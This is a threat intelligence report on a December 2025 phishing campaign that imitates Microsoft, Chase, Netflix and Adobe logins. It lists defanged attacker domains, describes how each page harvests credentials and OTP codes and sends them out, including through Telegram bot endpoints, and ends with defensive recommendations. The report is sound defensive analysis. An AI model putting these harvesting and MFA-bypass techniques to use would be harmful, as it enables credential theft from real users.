Between December 06 and December 18, 2025, analysts identified a sophisticated phishing campaign targeting organizations through advanced multi-stage credential harvesting operations that primarily impersonated Microsoft Azure/Office 365 services, with additional targeting of Netflix, Chase Bank, Adobe Cloud, and other major platforms. The incidents demonstrated notable technical sophistication including JavaScript-based credential exfiltration via AJAX requests and external APIs (particularly Telegram bot endpoints), extensive code obfuscation with base64-encoded payloads, comprehensive multi-factor authentication bypass capabilities through simulated OTP collection, and advanced anti-analysis measures such as browser fingerprinting, geolocation filtering, and clipboard manipulation.
Threat actors consistently employed legitimate service abuse tactics by hosting malicious content on compromised domains, Backblaze cloud storage, and Google Translate proxies while leveraging Cloudflare protection and authentic CDN resources to enhance credibility and evade detection. The campaigns featured sophisticated social engineering techniques including real-time UI transitions mimicking legitimate authentication flows, retry mechanisms that force credential re-entry, honeypot fields for bot detection, and personalized elements extracted from URL parameters to increase victim trust. These incidents represent an evolution toward proxy-based credential interception and comprehensive victim profiling that extends beyond basic credential theft to include browser fingerprinting, cookie harvesting, and enterprise-grade authentication simulation capabilities.
Domains Reviewed
- hiitecocom[.]hiiteco[.]com/?HjjWv=zzAoSXI&gZTuMkY=4211aa3dcef343799f1c5b... (2 variants)
- theacademygroup[.]philaports[.]co/FlEs-ViEw-mkPB8GC4vd-BuWla3F78CWbMPAEs...
- ane[.]za[.]com/AN/
- f005[.]backblazeb2[.]com/file/sharefileone/onedr-updated[.]html
- elgatobypasses[.]org/fr-en/login?serverState=%7B%22realm%22%3A%22growth%...
- www[.]competenle[.]de/piza/invitation/
- ajey-sqm[.]com/common?key=rr11tzhgh
- philfe[.]reuneioninc[.]company/W3iPj4x52hxm4JWwNoa8zJVHlmNo2dSiEaIxOIDUs...
- securechasecomwebauth[.]ea0secure[.]es/login
- www-accuradio-com[.]translate[.]goog/?_x_tr_sl=fr&_x_tr_tl=en&_x_tr_hl=e...
- mapbox[.]cipedre[.]solutions/y31frx3az4xlxx?3d871a864c43c7ce1-1343c11eb4...
On December 16, 2025, an employee at a Washington organization clicked the below phishing page.
This phishing page primarily captures credentials through a standard HTML form POST submission to "https://hiitecocom.hiiteco.com/common/login", impersonating Microsoft's Azure/Office 365 login infrastructure with sophisticated visual mimicry including authentic-looking CSS, JavaScript frameworks, and telemetry systems. The page employs several notable TTPs including extensive JavaScript obfuscation with encoded configuration data and complex browser fingerprinting capabilities, geolocation-aware content delivery through multiple CDN endpoints, and anti-analysis measures such as nonce-based script execution and error handling that could detect debugging attempts.
The infrastructure utilizes the suspicious "hiiteco.com" domain with multiple subdomains mimicking Microsoft's legitimate services, and the page includes advanced features like WebAuthn/FIDO2 support, desktop SSO simulation, and comprehensive client-side telemetry collection that rivals legitimate Microsoft implementations. This represents a highly sophisticated phishing operation that goes far beyond basic credential harvesting, incorporating advanced browser APIs, comprehensive user profiling, and enterprise-grade authentication simulation that would be extremely convincing to victims.
Additional similar attacks were clicked:
- hiitecocom[.]hiiteco[.]com/?HjjWv=zzAoSXI&gZTuMkY=45a08dfaa57a4ff1876e359686fa8262&sso_reload=true
On December 16, 2025, an employee at a Illinois organization clicked the below phishing page.
This phishing page uses JavaScript-based credential exfiltration through external script files (iPCot8cvRm83Bjw.js, eRG8LLZOwPVnAZvu.js, H0qjFgJDWKNbBGDFbDW.js) rather than traditional form submission, with credentials collected via multi-stage authentication mimicking Microsoft's login flow including username, password, MFA codes, and SMS verification. The page employs sophisticated evasion techniques including extensive CSS class name randomization, honeypot fields for bot detection, anti-inspection protection through disabled text selection and right-click, and base64-encoded configuration data (var_params_701, var_settings_365) to obfuscate functionality.
Notable advanced features include real-time UI transitions between authentication stages, simulated Microsoft Authenticator app verification with animated elements and random number generation, and comprehensive anti-analysis measures including user-select disabled globally and pointer-events manipulation. The infrastructure appears to be hosted on a compromised legitimate domain (philaports.co) with CloudFlare protection, representing a highly sophisticated credential harvesting operation that closely replicates Microsoft's entire authentication experience including 2FA bypass capabilities.
On December 16, 2025, an employee at a Virginia organization clicked the below phishing page.
This phishing page employs a multi-stage credential harvesting technique that combines standard form POST submission to "next.php" with JavaScript-based data exfiltration using jQuery AJAX requests, followed by a secondary OTP collection phase that submits to "Analysis405/otp_process.php". The page implements sophisticated social engineering through Adobe Cloud brand impersonation with multiple email provider options (Outlook, AOL, Office365, Yahoo), includes a retry mechanism that forces victims to re-enter credentials if the first attempt fails, and features comprehensive data collection including browser fingerprinting, cookie theft via multiple fetch() calls to "collector.php", and device information gathering.
The infrastructure shows signs of legitimate service abuse with Cloudflare protection (evidenced by the beacon script and challenge platform references), uses external CDN resources for jQuery and Bootstrap to appear legitimate, and implements a realistic two-factor authentication bypass by collecting OTP codes in a convincing popup modal. The sophistication level is advanced due to the multi-stage collection process, real-time credential validation, comprehensive victim profiling, and the seamless integration of MFA bypass techniques that closely mimic legitimate authentication flows.
On December 15, 2025, an employee at a Kentucky organization clicked the below phishing page.
This OneDrive phishing page uses JavaScript-based credential exfiltration via fetch() requests to send stolen credentials to a Telegram bot API endpoint (https://api.telegram.org/bot) after collecting email and password through a fake Microsoft login form. The page employs several notable TTPs including heavy JavaScript obfuscation with encoded function names and hex-encoded strings, IP geolocation checking to determine the victim's location before credential submission, and legitimate service abuse by hosting on Backblaze B2 cloud storage while impersonating Microsoft OneDrive with authentic-looking styling and logos.
The sophistication level is moderate to advanced due to the multi-stage data collection (IP geolocation first, then credentials), obfuscated code that makes analysis difficult, and the use of Telegram's legitimate API as an exfiltration channel rather than a traditional form POST to an attacker-controlled server. The page also implements error handling and retry mechanisms in the credential submission process, suggesting a well-developed phishing kit rather than a basic template.
On December 15, 2025, an employee at a Texas organization clicked the below phishing page.
This phishing page uses a sophisticated proxy-based approach where it displays Netflix's legitimate login page through the "elgatobypasses.org" domain, which functions as a web proxy service that intercepts and potentially captures credentials submitted to what appears to be the real Netflix site. The page employs multiple evasion techniques including extensive JavaScript obfuscation with base64-encoded components (__Cpn proxy framework), origin trial headers that spoof legitimate Google/Netflix tokens, and a complex proxy infrastructure that modifies HTML elements with "__cpp" attributes to maintain the appearance of the genuine Netflix interface. The credential capture mechanism appears to operate through the proxy's interception capability rather than a traditional form POST, as the base href is dynamically modified to point to the legitimate Netflix login while the actual domain remains the malicious proxy, allowing real-time credential harvesting.
On December 15, 2025, an employee at a Minnesota organization clicked the below phishing page.
This phishing page uses a multi-stage credential capture technique that initially submits credentials via AJAX POST to "processmail.php", followed by a secondary form that collects OTP codes and submits them to "process.php". The attack employs several sophisticated social engineering tactics including a Paperless Post brand impersonation with legitimate-looking UI elements, personalized inviter names extracted from URL parameters with animated typing effects, and a multi-step authentication flow that first displays "Incorrect Password" on the first attempt to make victims retry with their actual credentials, then progresses to fake OTP collection with a realistic countdown timer. The page demonstrates moderate sophistication through its use of JavaScript-based form handling that prevents actual form submission while exfiltrating data, multiple email provider options (Outlook, Office365, Yahoo, Gmail, AOL) to cast a wide net, and a convincing multi-factor authentication simulation that could successfully capture both passwords and 2FA codes from victims.
On December 10, 2025, an employee at a Kentucky organization clicked the below phishing page.
This phishing page uses a standard form POST to "/common/login" for initial credential capture, but incorporates several sophisticated Microsoft Azure AD impersonation techniques. The page extensively mimics legitimate Microsoft login infrastructure by loading authentic Microsoft CDN resources (aadcdn.msauth.net), implementing genuine Azure AD authentication flows with OAuth parameters, and utilizing real Microsoft branding elements and CSS styling to create a convincing replica. Notable TTPs include comprehensive brand impersonation through authentic-looking Microsoft login interface elements, sophisticated infrastructure abuse by hosting the malicious site on what appears to be a compromised domain while loading legitimate Microsoft assets, and URL manipulation techniques that redirect various authentication endpoints back to the malicious "ajey-sqm.com" domain instead of legitimate Microsoft services. The sophistication level is advanced due to the detailed replication of Microsoft's actual login flow, extensive use of legitimate Microsoft resources for credibility, and the complex OAuth parameter handling that could potentially facilitate token theft or session hijacking beyond basic credential collection.
On December 10, 2025, an employee at a Kentucky organization clicked the below phishing page.
This phishing page uses a basic HTML form submission method for credential capture, with the form likely POSTing to a backend script on the same compromised domain (reuneioninc.company). The page implements several notable evasion techniques including obfuscated CSS class names (randomized identifiers like a_item_940, a_panel_934), honeypot fields with the CSS class a_container_123 positioned off-screen to detect automated bots, and user selection blocking combined with right-click disabling to hinder analysis.
The infrastructure appears to be a compromised legitimate business domain rather than a disposable service, and the page includes sophisticated visual mimicry of Microsoft Office 365 login interfaces with proper branding, loading animations, and multi-step authentication flows. The sophistication level is moderate, featuring anti-bot measures and professional UI design, though it relies on traditional form submission rather than advanced JavaScript exfiltration methods, and notably includes external script loading from jquery CDN and references to security detection frameworks (PageConfig, PageValidator) that suggest this may be part of a larger phishing kit.
On December 09, 2025, an employee at a Illinois organization clicked the below phishing page.
This phishing page uses standard HTML form submission to capture credentials, with the form POSTing to the same malicious domain "https://securechasecomwebauth.ea0secure.es/login" along with a CSRF token for session management. The site employs sophisticated Chase Bank brand impersonation with authentic-looking CSS styling, logos, and footer links, plus includes a hidden security token field suggesting multi-factor authentication harvesting capabilities.
The infrastructure leverages the ".es" Spanish TLD with a deceptive subdomain structure "securechasecomwebauth" designed to appear legitimate to casual observers, and incorporates Cloudflare services for content delivery and bot protection as evidenced by the Cloudflare Insights beacon. The sophistication level is moderate, featuring real-time password visibility toggle functionality via jQuery, comprehensive form validation, and detailed brand replication, though it lacks advanced evasion techniques like geofencing or JavaScript-based credential exfiltration.
On December 09, 2025, an employee at a Illinois organization clicked the below phishing page.
This appears to be a legitimate AccuRadio website accessed through Google Translate rather than a phishing page, as evidenced by the authentic AccuRadio branding, legitimate tracking scripts from Facebook, Google Analytics, and advertising networks, and the Google Translate URL structure (www-accuradio-com.translate.goog). The page contains standard web analytics and advertising infrastructure including Facebook Pixel tracking, Google Tag Manager, various ad networks (Amazon, CPMStar), and consent management frameworks, but lacks any credential capture forms, suspicious JavaScript exfiltration methods, or phishing-related social engineering content. The technical implementation shows a sophisticated React-based web application with proper CDN usage, legitimate SSL certificates, and standard web development practices typical of a commercial streaming service. This represents a false positive in phishing detection, likely flagged due to the unusual Google Translate proxy URL structure rather than any malicious functionality.
On December 08, 2025, an employee at a Kentucky organization clicked the below phishing page.
This phishing page employs a sophisticated JavaScript-based credential exfiltration system using heavily obfuscated code stored in the variable "li" which appears to be base64 or custom encoded, along with anti-copy protection that prevents users from copying text by intercepting copy events and replacing clipboard content with just the letter "c". The page includes references to GoGuardian monitoring scripts and uses hidden HTML elements with deceptive loading messages ("Applying dynamic environment settings. Core modules are being tuned for optimal performance") to create a false sense of legitimacy while the obfuscated JavaScript likely handles credential collection and transmission. The infrastructure appears to be hosted on a compromised or malicious domain (mapbox.cipedre.solutions) with an unusually long URL path containing encoded parameters, and the page includes sophisticated evasion techniques through extensive code obfuscation that makes static analysis extremely difficult. This represents an advanced-level phishing operation due to the combination of heavy obfuscation, anti-analysis measures, clipboard manipulation, and the complex encoded payload that likely contains the actual credential harvesting functionality.
Recommendations
- Implement DNS filtering to block newly registered domains and suspicious subdomain patterns that impersonate legitimate services, particularly domains mimicking Microsoft Azure/Office365 authentication infrastructure.
- Deploy email security solutions that flag messages containing links to file-sharing services or cloud storage platforms when sent from external sources, and implement additional warnings for Google Translate proxy URLs.
- Configure web proxy and URL filtering systems to detect and block domains using deceptive naming conventions that combine legitimate service names (e.g., domains containing "secure" + legitimate brand names in subdomains).
- Establish monitoring and alerting for authentication attempts that exhibit suspicious patterns, such as multiple failed login attempts followed by MFA code requests, and implement conditional access policies requiring device compliance.
- Deploy user awareness training specifically focused on recognizing multi-stage phishing attacks that simulate complete authentication flows including MFA bypass techniques and retry mechanisms.
- Implement endpoint security solutions that can detect and block heavily obfuscated JavaScript execution, particularly scripts that manipulate clipboard content or disable standard browser functions like text selection and right-clicking.
- Configure security tools to monitor for credential submission attempts to non-standard endpoints (such as Telegram bot APIs or external script files) and establish network-level detection for these exfiltration channels.
